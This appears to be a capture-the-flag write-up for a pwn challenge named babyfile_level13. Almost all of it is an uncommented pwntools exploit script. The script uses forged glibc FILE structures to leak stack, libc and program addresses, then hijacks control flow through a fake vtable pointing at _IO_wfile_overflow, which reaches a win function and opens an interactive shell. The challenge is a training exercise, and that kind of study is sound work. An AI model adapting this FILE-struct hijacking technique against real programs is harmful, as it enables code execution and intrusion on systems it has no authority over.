(File Struct Exploits) level 13

Information

• category: pwn

Description

Apply FILE struct exploits to write data and hijack control flow.

Explit

RIP future me reading this exploit with no comments 0-0

#!/usr/bin/env python3

from pwn import *

exe = ELF("/challenge/babyfile_level13")
context.binary = exe


def conn():
    if args.LOCAL:
        global r
        r = process([exe.path])
        #gdb.attach(r)
    else:
        r = remote("addr", 1337)
    return r


def new_note(idx, size):
    r.sendlineafter(b"> ", b"new_note")
    r.sendlineafter(b"> ", idx)
    r.sendlineafter(b"> ", size)


def write_note(idx, data):
    r.sendlineafter(b"> ", b"write_note")
    r.sendlineafter(b"> ", idx)
    r.send(data)


def open_file():
    r.sendlineafter(b"> ", b"open_file")


def write_fp():
    r.sendlineafter(b"> ", b"write_fp")
    r.recvuntil(b"fp -> ")
    buf = int(r.recvline()[:-1], 16)
    return buf


def write_file(idx):
    r.sendlineafter(b"> ", b"write_file")
    r.sendlineafter(b"> ", idx)


def main():
    r = conn()

    r.recvuntil(b"writing to is: ")

    stack = int(r.recvline()[:-1], 16) + 0x68 

    new_note(b"0", b"8")
    write_note(b"0", b"AAAA")

    open_file()

    fp = FileStructure()
    fp = fp.write(stack, 0x10)

    write_fp()
    r.send(bytes(fp))
    
    write_file(b"0")

    r.recvuntil(b"fp);\n")

    puts = u64(r.recvline()[:-129].ljust(8, b"\x00")) - 378
    libc = puts - 0x84420
    _IO_wfile_overflow = libc + 0x1E8DC0

    fp = FileStructure()
    fp = fp.write(stack + 0x30, 10)

    write_fp()
    r.send(bytes(fp))

    write_file(b"0")
   
    r.recvuntil(b"fp);\n")
    elfbase = u64(r.recvline()[:-122]) - 0x211C - 201

    buf = write_fp()

    win = elfbase + exe.sym["win"]

    fp = FileStructure()
    fp._lock = buf
    fp.chain = win
    fp._wide_data = buf
    fp.vtable = _IO_wfile_overflow
    raw_input(b"DEBUG")
    r.send(bytes(fp) + p64(buf))

    write_file(b"0")
    r.interactive()

if __name__ == "__main__":
    main()